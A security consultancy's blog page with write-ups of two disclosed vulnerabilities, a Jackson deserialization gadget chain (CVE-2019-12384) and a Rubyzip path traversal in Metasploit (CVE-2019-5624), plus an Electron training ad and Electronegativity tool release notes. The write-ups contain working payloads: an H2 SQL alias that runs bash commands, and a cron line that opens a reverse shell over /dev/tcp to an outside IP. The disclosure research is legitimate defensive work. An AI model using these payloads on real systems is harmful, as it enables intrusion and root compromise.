Jackson gadgets - Anatomy of a vulnerability

Jackson CVE-2019-12384: anatomy of a vulnerability class

During one of our engagements, we analyzed an application which used the Jackson library for deserializing JSONs. In that context, we have identified a deserialization vulnerability where we could control the class to be deserialized. In this article, we want to show how an attacker may leverage this deserialization vulnerability to trigger attacks such as Server-Side Request Forgery (SSRF) and remote code execution.

This research also resulted in a new CVE-2019-12384 and a bunch of RedHat products affected by it:

Vulnerability Impact

What is required?

As reported by Jackson’s author in On Jackson CVEs: Don’t Panic — Here is what you need to know the requirements for a Jackson “gadget” vulnerability are:

  1. (1) The application accepts JSON content sent by an untrusted client (composed either manually or by a code you did not write and have no visibility or control over) — meaning that you can not constrain JSON itself that is being sent

  2. (2) The application uses polymorphic type handling for properties with nominal type of java.lang.Object (or one of small number of “permissive” tag interfaces such as java.util.Serializable, java.util.Comparable)

  3. (3) The application has at least one specific “gadget” class to exploit in the Java classpath. In detail, exploitation requires a class that works with Jackson. In fact, most gadgets only work with specific libraries — e.g. most commonly reported ones work with JDK serialization

  4. (4) The application uses a version of Jackson that does not (yet) block the specific “gadget” class. There is a set of published gadgets which grows over time so it is a race between people finding and reporting gadgets and the patches. Jackson operates on a blacklist. The deserialization is a “feature” of the platform and they continually update a blacklist of known gadgets that people report.

In this research we assumed that the preconditions (1) and (2) are satisfied. Instead, we concentrated on finding a gadget that could meet both (3) and (4). Please note that Jackson is one of the most used deserialization frameworks for Java applications where polymorphism is a first-class concept. Finding these conditions comes at zero-cost to a potential attacker who may use static analysis tools or other dynamic techniques, such as grepping for @class in request/responses, to find these targets.

Preparing for the battlefield

During our research we developed a tool to assist the discovery of such vulnerabilities. When Jackson deserializes ch.qos.logback.core.db.DriverManagerConnectionSource, this class can be abused to instantiate a JDBC connection. JDBC stands for (J)ava (D)ata(b)ase (C)onnectivity. JDBC is a Java API to connect and execute a query with the database and it is a part of JavaSE (Java Standard Edition). Moreover, JDBC uses an automatic string to class mapping, as such it is a perfect target to load and execute even more “gadgets” inside the chain.

In order to demonstrate the attack, we prepared a wrapper in which we load arbitrary polymorphic classes specified by an attacker. For the environment we used jRuby, a ruby implementation running on top of the Java Virtual Machine (JVM). With its integration on top of the JVM, we can easily load and instantiate Java classes.

We’ll use this setup to load Java classes easily in a given directory and prepare the Jackson environment to meet the first two requirements (1,2) listed above. In order to do that, we implemented the following jRuby script.

require 'java'
Dir["./classpath/*.jar"].each do |f|
	require f
end
java_import 'com.fasterxml.jackson.databind.ObjectMapper'
java_import 'com.fasterxml.jackson.databind.SerializationFeature'

content = ARGV[0]

puts "Mapping"
mapper = ObjectMapper.new
mapper.enableDefaultTyping()
mapper.configure(SerializationFeature::FAIL_ON_EMPTY_BEANS, false);
puts "Serializing"
obj = mapper.readValue(content, java.lang.Object.java_class) # invokes all the setters
puts "objectified"
puts "stringified: " + mapper.writeValueAsString(obj)

The script proceeds as follows:

  1. At line 2, it loads all of the classes contained in the Java Archives (JAR) within the “classpath” subdirectory
  2. Between lines 5 and 13, it configures Jackson in order to meet requirements (#2)
  3. Between lines 14 and 17, it deserializes and serializes a polymorphic Jackson object passed to jRuby as JSON

Memento: reaching the gadget

For this research we decided to use gadgets that are widely used by the Java community. All the libraries targeted in order to demonstrate this attack are in the top 100 most common libraries in the Maven central repository.

To follow along and to prepare for the attack, you can download the following libraries and put them in the “classpath” directory:

It should be noted the h2 library is not required to perform SSRF, since our experience suggests that most of the time Java applications load at least one JDBC Driver. JDBC Drivers are classes that, when a JDBC url is passed in, are automatically instantiated and the full URL is passed to them as an argument.

Using the following command, we will call the previous script with the aforementioned classpath.

$ jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:\"}]"

On line 15 of the script, Jackson will recursively call all of the setters with the key contained inside the subobject. To be more specific, the setUrl(String url) is called with arguments by the Jackson reflection library. After that phase (line 17) the full object is serialized into a JSON object again. At this point all the fields are serialized directly, if no getter is defined, or through an explicit getter. The interesting getter for us is getConnection(). In fact, as an attacker, we are interested in all “non pure” methods that have interesting side effects where we control an argument.

When the getConnection is called, an in memory database is instantiated. Since the application is short lived, we won’t see any meaningful effect from the attacker’s perspective. In order to do something more meaningful we create a connection to a remote database. If the target application is deployed as a remote service, an attacker can generate a Server Side Request Forgery (SSRF). The following screenshot is an example of this scenario.

Jackson Chain

Enter the Matrix: From SSRF to RCE

As you may have noticed both of these scenarios lead to DoS and SSRF. While those attacks may affect the application security, we want to show you a simple and effective technique to turn a SSRF into a full chain RCE.

In order to gain full code execution in the context of the application, we employed the capability of loading the H2 JDBC Driver. H2 is a super fast SQL database usually employed as in memory replacement for full-fledged SQL Database Management Systems (such as Postgresql, MSSql, MySql or OracleDB). It is easily configurable and it actually supports many modes such as in memory, on file, and on remote servers. H2 has the capability to run SQL scripts from the JDBC URL, which was added in order to have an in-memory database that supports init migrations. This alone won’t allow an attacker to actually execute Java code inside the JVM context. However H2, since it was implemented inside the JVM, has the capability to specify custom aliases containing java code. This is what we can abuse to execute arbitrary code.

We can easily serve the following inject.sql INIT file through a simple http server such as a python one (e.g. python -m SimpleHttpServer).

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
	String[] command = {"bash", "-c", cmd};
	java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
	return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('id > exploited.txt')

And run the tester application with:

$ jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'\"}]"
...
$ cat exploited.txt
uid=501(...) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),501(access_bpf),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh)

Voila’!

Iterative Taint-Tracking

Exploitation of deserialization vulnerabilities is complex and takes time. When conducting a product security review, time constraints can make it difficult to find the appropriate gadgets to use in exploitation. On the other end, the Jackson blacklists are updated on a monthly basis while users of this mechanism (e.g. enterprise applications) may have yearly release cycles.

Deserialization vulnerabilities are the typical needle-in-the-haystack problem. On the one hand, identifying a vulnerable entry point is an easy task, while finding a useful gadget may be time consuming (and tedious). At Doyensec we developed a technique to find useful Jackson gadgets to facilitate the latter effort. We built a static analysis tool that can find serialization gadgets through taint-tracking analysis. We designed it to be fast enough to run multiple times and iterate/improve through a custom and extensible rule-set language. On average a run on a Macbook PRO i7 2018 takes 2 minutes.

Jackson Taint Tracking

Taint-tracking is a topical academic research subject. Academic research tools are focused on a very high recall and precision. The trade-off lies between high-recall/precision versus speed/memory. Since we wanted this tool to be usable while testing commercial grade products and we valued the customizability of the tool by itself, we focused on speed and usability instead of high recall. While the tool is inspired by other research such as flowdroid, the focus of our technique is not to rule out the human analyst. Instead, we believe in augmenting manual testing and exploitation with customizable security automation.

This research was possible thanks to the 25% research time at Doyensec. Tune in again for new episodes.

That’s all folks! Keep it up and be safe!


Electron Security Workshop

2-Days Training on How to Build Secure Electron Applications

We are excited to present our brand-new class on Electron Security! This blog post provides a general overview of the 2-days workshop.

ElectronJS Logo

With the increasing popularity of the ElectronJs Framework, we decided to create a class that teaches students how to build and maintain secure desktop applications that are resilient to attacks and common classes of vulnerabilities. Building secure Electron applications is possible, but complicated. You need to know the framework, follow its evolution, and constantly update and devise in depth defense mechanisms to mitigate its deficiencies.

Our training begins with an overview of Electron internals and the life cycle of a typical Electron-based application. After a quick intro, we will jump straight into threat modeling and attack surface. We will analyze what are the common root causes for misconfigurations and vulnerabilities. The class will be centered around two main topics: subverting the framework and breaking the custom application code. We will present security misconfigurations, security anti-patterns, nodeIntegration and sandbox bypasses, insecure preload bugs, prototype pollution attacks, affinity abuses and much more.

The class is hands-on with many live examples. The exercises and scenarios will help students understand how to identify vulnerabilities and build mitigations. Throughout the class, we will also have a few Q&A panels to answer all questions attendees might have and potentially review their code.

If you’re interested, check out this short teaser:

Audience Profile

Who should take this course?

  • JavaScript and Node.js Developers
  • Security Engineers
  • Security Auditors and Pentesters

We will provide details on how to find and fix security vulnerabilities, which makes this class suitable for both blue and red teams. Basic JavaScript development experience and basic understanding of web application security (e.g. XSS) is required.

General Information

Attendees will receive a bundle with all material, including:

  • Workshop presentation (over 200 slides)
  • Code, exploits and artifacts of all exercises
  • Certificate of completion

This 2-days training is delivered in English, either remotely or on-site (worldwide).

Doyensec will accept up to 15 attendees per tutor. If the number of attendees exceeds the maximum allowed, Doyensec will allocate additional tutors.

We’re a flexible security boutique and can further customize the agenda to your specific company’s needs.

Feel free to contact us at info@doyensec.com for scheduling your class!


Electronegativity 1.3.0 released!

After the first public release of Electronegativity, we had a great response from the community and the tool quickly became the baseline for every Electron app’s security review for many professionals and organizations. This pushed us forward, improving Electronegativity and expanding our research in the field. Today we are proud to release version 1.3.0 with many new improvements and security checks for your Electron applications.


We’re also excited to announce that the tool has been accepted for Black Hat USA Arsenal 2019, where it will be showcased at the Mandalay Bay in Las Vegas. We’ll be at Arsenal Station 1 on August 7, from 4:00 pm to 5:20 pm. Drop by to see live demonstrations of Electronegativity hunting real Electron applications for vulnerabilities (or just to say hi and collect Doyensec socks)!

If you’re simply interested in trying out what’s new in Electronegativity, go ahead and update or install it using NPM:

$ npm install @doyensec/electronegativity -g
# or
$ npm update @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

What’s New

Electronegativity 1.1.1 initially shipped with 27 unique checks. Now it counts over 40 checks, featuring a new advanced check system to help improve the tool’s detection capabilities in sorting out false positive and false negative findings. Here is a brief list of what’s new in this 1.3.0 release:

  • Now every check has an importance and accuracy attribute which helps the auditor to determine the importance of each finding. Consequently, we also introduced some new command line flags to filter the results by severity (--severity) and by confidence (--confidence), useful for tailored Electronegativity integration in your application security pipelines or build systems.
  • We introduced a new class of checks called GlobalChecks which can dynamically set the severity and confidence for the findings or create new ones considering the inherit security risk posed by their interaction (e.g. cross-checking the nodeIntegration and sandbox flags value or the presence of the affinity flag used acrossed different windows).
  • Variable scoping analysis capabilities have been added to inspect the Function and Global variable content, when available.
  • A new single-check scan mode is now provided by passing the -l flag along with a list of enabled checks (e.g. -l "AuxClickJsCheck,AuxClickHtmlCheck"). Another command line flag has been introduced to show relative paths for files (-r).
  • The newly introduced Electron’s component BrowserView is now supported, which is meant to be an alternative to the WebView tag. The tool now also detects the use of the nodeIntegrationInSubFrames experimental option for enabling NodeJS support in sub-frames (e.g. an iframe inside a webview object).
  • Various bug fixes and new checks! (see below)

Updated Checks

This new release also comes with new and updated checks. As always, a knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities.

Affinity Check

When specified, renderers with the same affinity will run in the same renderer process. Due to reusing the renderer process, certain webPreferences options will also be shared between the web pages even when you specified different values for them. This can lead to unexpected security configuration overrides:

Affinity Property Vulnerability

In the above demo, the affinity set between the two BrowserWindow objects will cause the unwanted share of the nodeIntegration property value. Electronegativity will now issue a finding reporting the usage of this flag if present.

Read more on the dedicated AFFINITY_GLOBAL_CHECK wiki page.

AllowPopups Check

When the allowpopups attribute is present, the guest page will be allowed to open new windows. Popups are disabled by default.

Read more on the ALLOWPOPUPS_HTML_CHECK wiki page.

Missing Electron Security Patches Detection

This check detects if there are security patches available for the Electron version used by the target application. From this release we switched from manually updating a safe releases file to creating a routine which automatically fetches the latest releases from Electron’s official repository and determines if there are security patches available at each run.

Read more on the AVAILABLE_SECURITY_FIXES_GLOBAL_CHECK and ELECTRON_VERSION_JSON_CHECK wiki page.

Check for Custom Command Line Arguments

This check will compare the custom command line arguments set in the package.json scripts and configuration objects against a blacklist of dangerous arguments. The use of additional command line arguments can increase the application attack surface, disable security features or influence the overall security posture.

Read more on the CUSTOM_ARGUMENTS_JSON_CHECK wiki page.

CSP Presence Check and Review

Electronegativity now checks if a Content Security Policy (CSP) is set as an additional layer of protection against cross-site-scripting attacks and data injection attacks. If a CSP is detected, it will look for weak directives by using a new library based on the csp-evaluator.withgoogle.com online tool.

Read more on the CSP_GLOBAL_CHECK wiki page.

Dangerous JS Functions called with user-supplied data

Looks for occurrences of insertCSS, executeJavaScript, eval, Function, setTimeout, setInterval and setImmediate with user-supplied input.

Read more on the DANGEROUS_FUNCTIONS_JS_CHECK wiki page.

Check for mitigations set to limit the navigation flows

Detects if the on() handler for will-navigate and new-window events is used. This setting can be used to limit the exploitability of certain issues. Not enforcing navigation limits leaves the Electron application under full control to remote origins in case of accidental navigation.

Read more on the LIMIT_NAVIGATION_GLOBAL_CHECK and LIMIT_NAVIGATION_JS_CHECK wiki pages.

Detects if Electron’s security warnings have been disabled

The tool will check if Electron’s warnings and recommendations printed to the developer console have been force-disabled by the developer. Disabling this warning may hide the presence of misconfigurations or insecure patterns to the developers.

Read more on the SECURITY_WARNINGS_DISABLED_JS_CHECK and SECURITY_WARNINGS_DISABLED_JSON_CHECK wiki pages.

Detects if setPermissionRequestHandler is missing for untrusted origins

Not enforcing custom checks for permission requests (e.g. media) leaves the Electron application under full control of the remote origin. For instance, a Cross-Site Scripting vulnerability can be used to access the browser media system and silently record audio/video. Because of this, Electronegativity will also check if a setPermissionRequestHandler has been set.

Read more on the PERMISSION_REQUEST_HANDLER_GLOBAL_CHECK wiki page.

…and more to come! If you are a developer, we encourage you to use Electronegativity to understand how these Electron’s security pitfalls affect your application and how to avoid them. We really believe that Electron deserves a strong security community behind and that creating the right and robust tools to help this community is the first step towards improving the whole Electron’s ecosystem security stance.

As a final remark, we’d like to thank all past and present contributors to this tool: @ikkisoft, @p4p3r, @0xibram, @yarlob, @lorenzostella, and ultimately @Doyensec for sponsoring this release.

See you in Vegas!

@lorenzostella


On insecure zip handling, Rubyzip and Metasploit RCE (CVE-2019-5624)

During one of our projects we had the opportunity to audit a Ruby-on-Rails (RoR) web application handling zip files using the Rubyzip gem. Zip files have always been an interesting entry-point to triggering multiple vulnerability types, including path traversals and symlink file overwrite attacks. As the library under testing had symlink processing disabled, we focused on path traversal exploitation.

This blog post discusses our results, the “bug” discovered in the library itself and the implication of such an issue in a popular piece of software - Metasploit.


Rubyzip and old vulnerabilities

The Rubyzip gem has a long history of path traversal vulnerabilities (1, 2) through malicious filenames. Particularly interesting was the code change in PR #376 where a different handling was implemented by the developers.

# Extracts entry to file dest_path (defaults to @name).
# NB: The caller is responsible for making sure dest_path is safe, 
# if it is passed.
def extract(dest_path = nil, &block)
    if dest_path.nil? && !name_safe?
        puts "WARNING: skipped #{@name} as unsafe"
        return self
    end

[...]

Entry#name_safe is defined a few lines before as:

# Is the name a relative path, free of `..` patterns that could lead to
# path traversal attacks? This does NOT handle symlinks; if the path
# contains symlinks, this check is NOT enough to guarantee safety.
def name_safe?
    cleanpath = Pathname.new(@name).cleanpath
    return false unless cleanpath.relative?
    root = ::File::SEPARATOR
    naive_expanded_path = ::File.join(root, cleanpath.to_s)
    cleanpath.expand_path(root).to_s == naive_expanded_path
end

In the code above, if the destination path is passed to the Entry#extract function then it is not actually checked. A comment in the source code of that function highlights the user’s responsibility:

# NB: The caller is responsible for making sure dest_path is safe, if it is passed.

While the Entry#name_safe is a fair check against path traversals (and absolute paths), it is only executed when the function is called without arguments.

In order to verify the library bug we generated a ZIP PoC using the old (and still good) evilarc, and extracted the malicious file using the following code:

require 'zip'

first_arg, *the_rest = ARGV

Zip::File.open(first_arg) do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end
$ ls /tmp/file.txt
ls: cannot access '/tmp/file.txt': No such file or directory
$ zipinfo absolutepath.zip 
Archive:  absolutepath.zip
Zip file size: 289 bytes, number of entries: 2
drwxr-xr-x  2.1 unx        0 bx stor 18-Jun-13 20:13 /tmp/
-rw-r--r--  2.1 unx        5 bX defN 18-Jun-13 20:13 /tmp/file.txt
2 files, 5 bytes uncompressed, 7 bytes compressed:  -40.0%
$ ruby Rubyzip-poc.rb absolutepath.zip 
Extracting /tmp/
Extracting /tmp/file.txt
$ ls /tmp/file.txt
/tmp/file.txt

Resulting in a file being created in /tmp/file.txt, which confirms the issue.

As happened with our client, most developers might have upgraded to Rubyzip 1.2.2 thinking it was safe to use without actually verifying how the library works or its specific usage in the codebase.

It would have been vulnerable anyway ¯\_(ツ)_/¯

In the context of our web application, the user-supplied zip was decompressed through the following (pseudo) code:

def unzip(input)
    uuid = get_uuid()
    # 0. create a 'Pathname' object with the new uuid
    parent_directory = Pathname.new("#{ENV['uploads_dir']}/#{uuid}")

    Zip::File.open(input[:zip_file].to_io) do |zip_file|
        zip_file.each_with_index do |entry, index|
            # 1. check the file is not present
            next if File.file?(parent_directory + entry.name)
            # 2. extract the entry
            entry.extract(parent_directory + entry.name)
        end
    end
    Success
end

In item #0 we can see that a Pathname object is created and then used as the destination path of the decompressed entry in item #2. However, the sum operator between objects and strings does not work as many developers would expect and might result in unintended behavior.

We can easily understand its behavior in an IRB shell:

$ irb
irb(main):001:0> require 'pathname'              
=> true
irb(main):002:0> parent_directory = Pathname.new("/tmp/random_uuid/")
=> #<Pathname:/tmp/random_uuid/>
irb(main):003:0> entry_path = Pathname.new(parent_directory + File.dirname("../../path/traversal"))
=> #<Pathname:/path>
irb(main):004:0> destination_folder = Pathname.new(parent_directory + "../../path/traversal")
=> #<Pathname:/path/traversal>
irb(main):005:0> parent_directory + "../../path/traversal"
=> #<Pathname:/path/traversal>

Thanks to the interpretation of the ../ by Pathname, the argument to Rubyzip’s Entry#extract call does not contain any path traversal payloads which results in a mistakenly supposed “safe” path. Since the gem does not perform any validation, the exploitation does not even require this unexpected path concatenation.

From Arbitrary File Write to RCE (RoR Style)

Apart from the usual *nix and windows specific techniques (like writing a new cronjob or exploiting custom scripts), we were interested in understanding how we could leverage this bug to achieve RCE in the context of a RoR application.

Since our target was running in production environments, RoR classes were cached on first usage via the cache_classes directive. During the time allocated for the engagement we didn’t find a reliable way to load/inject arbitrary code at runtime via file write without requiring a RoR reboot.

However, we did verify in a local testing environment that chaining together a Denial of Service vulnerability and a full path disclosure of the web app root can be used to trigger the web server reboot and achieve RCE via the aforementioned zip handling vulnerability.

The official documentation explains that:

After it loads the framework plus any gems and plugins in your application, Rails turns to loading initializers. An initializer is any file of ruby code stored under /config/initializers in your application. You can use initializers to hold configuration settings that should be made after all of the frameworks and plugins are loaded.

Using this feature, an attacker with the right privileges can add a malicious .rb in the /config/initializers folder which will be loaded at web server (re)boot.

Attacking the attackers. Metasploit Authenticated RCE (CVE-2019-5624)

Just after the end of the engagement and with the approval of our customer, we started looking at popular software that was likely affected by the Rubyzip bug. As we were brainstorming potential targets, an icon on one of our VMs caught our attention: Metasploit Framework

Going through the source code, we were able to quickly identify several files that are using the Rubyzip library to create ZIP files. Since our vulnerability resides in the extract function, we recalled an option to import a ZIP workspace from previous MSF versions or from different instances. We identified the corresponding code path in zip.rb file (line 157) that is responsible for importing a Metasploit ZIP File:

 data.entries.each do |e|
      target = ::File.join(@import_filedata[:zip_tmp], e.name)
      data.extract(e,target)

As for the vanilla Rubyzip example, creating a ZIP file containing a path traversal payload and embedding a valid MSF workspace (an XML file containing the exported info from a scan) made it possible to obtain a reliable file-write primitive. Since the extraction is done as root, we could easily obtain remote command execution with high privileges using the following steps:

  1. Create a file with the following content:
    * * * * * root /bin/bash -c "exec /bin/bash 0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
  2. Generate the ZIP archive with the path traversal payload:
    python evilarc.py exploit --os unix -p etc/cron.d/
  3. Add a valid MSF workspace to the ZIP file (in order to have MSF to extract it, otherwise it will refuse to process the ZIP archive)
  4. Setup two listeners, one on port 4444 and the other on port 4445 (the one on port 4445 will get the reverse shell)
  5. Login in the MSF Web Interface
  6. Create a new “Project”
  7. Select “Import”, “From file”, chose the evil ZIP file and finally click the “Import” button
  8. Wait for the import process to finish
  9. Enjoy your reverse shell


Conclusions

In case you are using Rubyzip, check the library usage and perform additional validation against the entry name and the destination path before calling Entry#extract.

Here is a small recap of the different scenarios (as of Rubyzip v1.2.2):

Usage Input by user? Vulnerable to path traversal?
entry.extract(path) yes (path) yes
entry.extract(path) partially (path is concatenated) maybe
entry.extract() partially (entry name) no
entry.extract() no no

If you’re using Metasploit, it is time to patch. We look forward to seeing a msf module for CVE-2019-5624.

Credits and References

Credit for the research and bugs go to @voidsec and @polict.

This work has been performed during a customer engagement and Doyensec 25% Research Time. As such, we would like to thank our customer and Metasploit maintainers for their support.

If you’re interested in the topic, take a look at the following resources: